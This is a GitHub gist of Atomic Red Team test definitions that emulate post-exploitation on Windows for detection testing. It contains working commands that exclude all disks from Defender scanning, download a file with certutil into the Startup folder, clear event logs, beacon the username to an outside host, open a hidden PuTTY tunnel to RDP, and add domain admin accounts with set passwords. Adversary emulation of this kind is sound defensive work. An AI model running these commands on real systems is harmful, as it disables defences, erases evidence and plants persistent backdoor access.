Skip to content

Instantly share code, notes, and snippets.

@MHaggis
Last active February 27, 2024 14:48
Show Gist options
  • Save MHaggis/8571e31b2668af21d978863ef1c5b76d to your computer and use it in GitHub Desktop.
Save MHaggis/8571e31b2668af21d978863ef1c5b76d to your computer and use it in GitHub Desktop.
Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls
attack_technique: Many
display_name: Slash and Grab Post-Ex
atomic_tests:
- name: Add all logical disks to Windows Defender exclusion list
description: |
This test adds all logical disks on the system to the Windows Defender exclusion list.
supported_platforms:
- windows
executor:
command: |
foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}
name: powershell
elevation_required: true
- name: certutil download (urlcache)
description: |
Use certutil -urlcache argument to download a file from the web
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
local_path:
description: Local path to place file
type: path
default: c:\mpyutild.msi
executor:
command: |
cmd /c certutil -urlcache -f #{remote_file} #{local_path}
move #{local_path} "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
cleanup_command: |
del #{local_path} >nul 2>&1
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\#{local_path}" >nul 2>&1
name: command_prompt
- name: Clear Logs
description: |
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
supported_platforms:
- windows
input_arguments:
log_name:
description: Windows Log Name, ex System
type: string
default: System
executor:
command: |
wevtutil cl #{log_name}
name: command_prompt
elevation_required: true
- name: UserName Checkin
description: |
This test checks in with a remote server using PowerShell.
supported_platforms:
- windows
input_arguments:
url:
description: URL to check in with
type: url
default: https://9d06e4f428c94e3295277e2784036c61.api.mockbin.io/MyUserName_$env:UserName
executor:
command: |
powershell -c "Invoke-WebRequest -Uri #{url}"
name: command_prompt
elevation_required: false
- name: Create Scheduled Task
description: |
This test creates a scheduled task using SCHTASKS command.
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the task
type: string
default: "\\Microsoft\\Windows\\Wininet\\UserCache_1708535250863"
task_run:
description: Task to be run
type: string
default: "C:\\Windows\\Help\\Help\\SentinelUI.exe"
executor:
command: |
SCHTASKS /Create /TN "#{task_name}" /TR "#{task_run}" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05
cleanup_command: |
SCHTASKS /Delete /TN "#{task_name}" /F
name: command_prompt
elevation_required: true
- name: Download PuTTY and setup SSH tunnel
description: |
This test downloads PuTTY from a URL and sets up an SSH tunnel.
supported_platforms:
- windows
input_arguments:
host:
description: SSH host
type: string
default: example.com
executor:
command: |
powershell -c "Invoke-WebRequest -Uri https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -OutFile C:\putty\putty.exe"
powershell -c "$r = 'C:\putty\'; $e = $r + 'putty.exe'; $g = '#{host}'; $args = @('tunnel@' + $g, '-P 443', '-N', '-ssh', '-L 9595:localhost:3389'); (Start-Process -FilePath $e -ArgumentList $args -PassThru -WindowStyle Hidden).Id"
cleanup_command: |
powershell -c "Stop-Process -Name putty -Force"
powershell -c "Remove-Item -Path C:\putty\putty.exe -Force"
name: powershell
elevation_required: false
- name: Download and Install Chrome Remote Desktop Host
description: |
This test downloads Chrome Remote Desktop Host from a URL and installs it.
supported_platforms:
- windows
executor:
command: |
$path = Join-Path -Path $env:ProgramData -ChildPath '1.msi'
(New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $path)
Start-Process 'msiexec.exe' -ArgumentList "/i `"$path`"" -Wait
cleanup_command: |
Remove-Item -Path $env:ProgramData\1.msi -Force
name: powershell
elevation_required: true
- name: Add Users and Assign Groups
description: |
This test adds users to the domain and assigns them to various groups.
supported_platforms:
- windows
executor:
command: |
net user /add default test@2021! /domain
net group "Domain Admins" default /add /domain
net group "Enterprise Admins" default /add /domain
net group "Remote Desktop Users" default /add /domain
net group "Group Policy Creator Owners" default /add /domain
net group "Schema Admins" default /add /domain
net user default /active:yes /domain
net user /add default1 test@2021! /domain
net user /add default1 test@2021! /domain
net user /add oldadmin Pass8080!!
net localgroup administrators oldadmin /add
net user temp 123123qwE /add /domain
net group "Domain Admins" temp /add /domain
name: command_prompt
elevation_required: true
cleanup_command: |
net user default /delete /domain
net group "Domain Admins" default /delete /domain
net group "Enterprise Admins" default /delete /domain
net group "Remote Desktop Users" default /delete /domain
net group "Group Policy Creator Owners" default /delete /domain
net group "Schema Admins" default /delete /domain
net user default1 /delete /domain
net user oldadmin /delete
net localgroup administrators oldadmin /delete
net user temp /delete /domain
net group "Domain Admins" temp /delete /domain
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment